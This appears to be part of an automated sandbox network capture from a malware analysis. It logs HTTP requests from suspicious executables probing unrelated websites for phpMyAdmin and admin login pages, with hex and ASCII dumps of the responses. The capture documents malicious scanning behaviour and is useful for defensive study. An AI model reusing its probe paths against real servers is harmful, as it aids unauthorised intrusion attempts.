                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OsCmUWKS5snfiU3Ndad%2BIyV8grTNQ0JT%2BlIhn5W28Z%2BkzbhUAFVxG%2Fbetw6o0gsVfupW49Rfl99DhypDwbDWHupEBbDv5r%2B6XupovMwSIXytqovtGv%2F4KWQuaVjc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cfruid=401e12dfda5cd3645c7fd99b35f8ae9a3549d894-1707131772; path=/; domain=.discord.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: _cfuvid=M13HsN5o_wGvp6QRdCmAIS.nrcKvYVZe2oTEllPPbj8-1707131772720-0-604800000; path=/; domain=.discord.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd6b7e1f2438-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                562192.168.2.64976236.255.71.45804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.677614927 CET176OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: instructory.net
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.045938969 CET150INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:17 GMT
                                                                                                                                                                                                                                                                                                                                                                content-length: 0
                                                                                                                                                                                                                                                                                                                                                                location: https://instructory.net/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                563192.168.2.649767103.90.225.70804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.683357954 CET168OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ngoalongvn.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.034038067 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Server: Microsoft-IIS/8.5
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1245
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 3c 21 2d 2d 0d 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 45 45 45 45 45 45 3b 7d 0d 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 7d 20 0d 0a 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 7d 0d 0a 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 37 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0d 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0d 0a 23 68 65 61 64 65 72 7b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 30 3b 70 61 64 64 69 6e 67 3a 36 70 78 20 32 25 20 36 70 78 20 32 25 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 74 72 65 62 75 63 68 65 74 20 4d 53 22 2c 20 56 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 46 46 46 3b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 35 35 35 35 35 3b 7d 0d 0a 23 63 6f 6e 74 65 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 32 25 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2e 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 46 46 3b 77 69 64 74 68 3a 39 36 25 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 38 70 78 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 2d 2d 3e 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 68 65 61 64 65 72 22 3e 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 3c 2f 64 69 76 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 66 69 65 6c 64 73 65 74 3e 0d 0a 20 20 3c 68 32 3e 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 32 3e 0d 0a 20 20 3c 68 33 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.034055948 CET119INData Raw: 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 68 33 3e 0d 0a 20 3c 2f 66 69 65 6c 64 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: been removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                564192.168.2.64999444.195.133.14580524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.721868038 CET172OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: ucv.blackboard.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.836885929 CET575INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-control: no-cache="set-cookie"
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://ucv.blackboard.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: AWSELB=75CBFFD512C5775942CE3BA2F04D8690E53FBAB74419178944AAED0016459F27E1FD7932EE10F8662CA549F3FD503336620C511FF443E7315D4F16653F0D42A1913B3F30D1;PATH=/;MAX-AGE=900
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 175
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>openresty/1.21.4.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                565192.168.2.649928185.51.191.4880524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.870779991 CET283OUTGET /admin/w/login HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                Cookie: VISITORID=6f23480ee7ffaf87556eb25c893227a7; PHPSESSID=ba0ae7db91a15a20c859a36e9617e7c7
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331842899 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:12 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 33 35 37 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 74 69 74 6c 65 3e 49 6e 6e 6f 6d 65 3c 2f 74 69 74 6c 65 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 79 73 74 65 6d 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 66 6c 61 67 73 2e 63 73 73 3f 76 3d 31 2e 38 30 38 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 63 61 70 61 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 79 65 73 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 6d 6f 62 69 6c 65 2d 77 65 62 2d 61 70 70 2d 73 74 61 74 75 73 2d 62 61 72 2d 73 74 79 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 61 63 6b 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6c 65 61 72 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 6e 22 20 2f 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 3e 0d 0a 09 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 61 64 6d 69 6e 2f 61 64 6d 69 6e 2e 63 73 73 3f 76 3d 31 37 30 37 31 33 31 37 37 32 22 20 2f 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 69 6e 6e 6f 76 61 74 69 6f 6e 64 65 76 65 6c 6f 70 6d 65 6e 74 2e 65 75 2f 61 64 6d 69 6e 2f 5f 63 75 73 74 6f 6d 5f 61 64 6d 69 6e 2e 63 73 73 3f 76 3d 31 37 30 37 31 33 31 37 37 32 22 20 2f 3e 0d 0a 09 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 2f 63 6f 64 65 2e 6a 71 75 65 72 79 2e 63 6f 6d 2f 75 69 2f 31 2e 31 31 2e 32 2f 74 68 65 6d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 3575<!DOCTYPE html><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"><head><title>Innome</title><link rel="stylesheet" href="/css/system.css?v=1.808" /><link rel="stylesheet" href="/css/flags.css?v=1.808" /><meta name="viewport" content="width=device-width, initial-scale=1.0"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black" /><meta name="MobileOptimized" content="width" /><meta name="HandheldFriendly" content="true" /><meta http-equiv="cleartype" content="on" /><meta name="twitter:card" content="summary_large_image"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/admin.css?v=1707131772" /><link rel="stylesheet" href="http://innovationdevelopment.eu/admin/_custom_admin.css?v=1707131772" /><link rel="stylesheet" href="//code.jquery.com/ui/1.11.2/them
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331856012 CET1286INData Raw: 65 73 2f 73 6d 6f 6f 74 68 6e 65 73 73 2f 6a 71 75 65 72 79 2d 75 69 2e 63 73 73 22 20 2f 3e 0d 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 2f 63 6f 64 65 2e 6a 71 75 65 72
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: es/smoothness/jquery-ui.css" /><script type="text/javascript" src="//code.jquery.com/jquery-1.11.1.min.js"></script><script type="text/javascript" src="//code.jquery.com/ui/1.11.2/jquery-ui.min.js"></script><script type="text/javascri
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331867933 CET1286INData Raw: 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6e 69 63 65 73 63 72 6f 6c 6c 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ="text/javascript" src="/js/jquery/jquery.nicescroll.js"></script><link rel="stylesheet" href="/js/jquery/icheck/skins/flat/blue.css"><script type="text/javascript" src="/js/jquery/icheck/icheck.min.js"></script><link rel="stylesheet"
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331880093 CET1286INData Raw: 77 68 69 74 65 3b 7a 2d 69 6e 64 65 78 3a 35 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 7d 0d 0a 09 2e 62 6f 78 7b 62 6f 78 2d 73 68 61 64 6f 77 3a 30 70 78 20 30 70 78 20 33 70 78 20 23 33 33 33 33 33 33 3b 7a 2d 69 6e 64 65 78 3a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: white;z-index:5;position:relative;}.box{box-shadow:0px 0px 3px #333333;z-index:5;position:relative;}.info{box-shadow:0px 0px 3px #333333;z-index:5;position:relative;}</style>...[if IE]><script src="http://html5shiv.googleco
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331891060 CET1286INData Raw: 0a 09 09 7d 0d 0a 09 7d 29 3b 0d 0a 09 66 75 6e 63 74 69 6f 6e 20 63 6f 70 79 54 78 74 28 65 6c 65 6d 29 20 7b 0d 0a 09 09 76 61 72 20 63 6f 70 79 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: }});function copyTxt(elem) {var copyText = document.getElementById(elem);copyText.select();copyText.setSelectionRange(0, 99999); /*For mobile devices*/document.execCommand("copy");$('<div>Szveg vglapra helyez
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331901073 CET1286INData Raw: 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 22 3e 31 32 3a 31 36 3a 31 32 3c 2f 62 3e 3c 2f 64 69 76 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 09 76 61 72 20 61 64 6d 69 6e 5f 62 61 6e 6e 65 72 5f 74 69 6d 65 5f 69 6e 74 3d 73 65 74 49 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lay:inline-block;">12:16:12</b></div><script>var admin_banner_time_int=setInterval(function(){date=new Date();h=date.getHours(); if(h<10) h="0"+h; m=date.getMinutes(); if(m<10) m="0"+m; s=date.g
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331912994 CET1286INData Raw: 65 5f 66 70 73 22 20 73 74 79 6c 65 3d 22 7a 2d 69 6e 64 65 78 3a 31 30 30 30 3b 6c 65 66 74 3a 30 3b 74 6f 70 3a 31 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 62 6c 61
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e_fps" style="z-index:1000;left:0;top:100px;position:absolute;background-color:black;color:white;"></span></div> <script>(function() {setTimeout(function(){$('#admin_bing_bg_wrapper').fadeIn(1000);},500);setTimeout(fu
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331926107 CET1286INData Raw: 0a 09 09 76 61 72 20 66 70 73 3d 30 2c 20 66 70 73 5f 73 75 6d 3d 30 2c 20 66 70 73 5f 61 6c 6c 3d 30 3b 0d 0a 09 09 76 61 72 20 77 69 6e 64 3d 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2d 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 29 2f 31 30 30 3b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: var fps=0, fps_sum=0, fps_all=0;var wind=(Math.random()-Math.random())/100;var mousex, mousey=0;var fpsdown=0;// MaininitHeader();addListeners();function initHeader() {width = $('#admin_bing_bg_wrapper
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331942081 CET1286INData Raw: 75 65 73 74 41 6e 69 6d 46 72 61 6d 65 28 29 7b 0d 0a 09 09 09 69 66 28 21 6c 61 73 74 43 61 6c 6c 65 64 54 69 6d 65 29 20 7b 0d 0a 09 09 09 09 6c 61 73 74 43 61 6c 6c 65 64 54 69 6d 65 20 3d 20 44 61 74 65 2e 6e 6f 77 28 29 3b 0d 0a 09 09 09 09
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: uestAnimFrame(){if(!lastCalledTime) {lastCalledTime = Date.now();fps = 0;return;}delta = (Date.now() - lastCalledTime)/1000;lastCalledTime = Date.now();fps = 1/delta;fps_sum++;fps_all=fps_al
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.331954956 CET1286INData Raw: 0d 0a 09 09 09 09 5f 74 68 69 73 2e 61 6c 70 68 61 20 3d 20 30 3b 0d 0a 09 09 09 09 5f 74 68 69 73 2e 73 63 61 6c 65 20 3d 20 31 2b 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 2a 32 3b 0d 0a 09 09 09 09 5f 74 68 69 73 2e 76 65 6c 6f 63 69 74 79 20 3d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: _this.alpha = 0;_this.scale = 1+Math.random()*2;_this.velocity = Math.random();_this.life = 0;_this.speed = 0.01+Math.random()/100;}this.draw = function() {if(_this.alpha < 0 || _this.life>2 || _
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.339535952 CET1133INData Raw: 73 73 3d 22 6c 6f 67 69 6e 22 3e 0d 0a 09 09 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 22 20 6d 65 74 68 6f 64 3d 22 50 4f 53 54 22 20 63 6c 61 73 73 3d 22 6e 69 63 65 63 68 65 63 6b 22 3e 0d 0a 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ss="login"><form action="" method="POST" class="nicecheck"><input type="text" name="uname" placeholder="Username" required /><br><br><input type="password" name="pass" placeholder="Password" required /><br><br><cen


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                566192.168.2.65003931.13.65.180524C:\Users\user\AppData\Local\Temp\572.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.870824099 CET177OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: web.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.972733974 CET211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://web.facebook.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
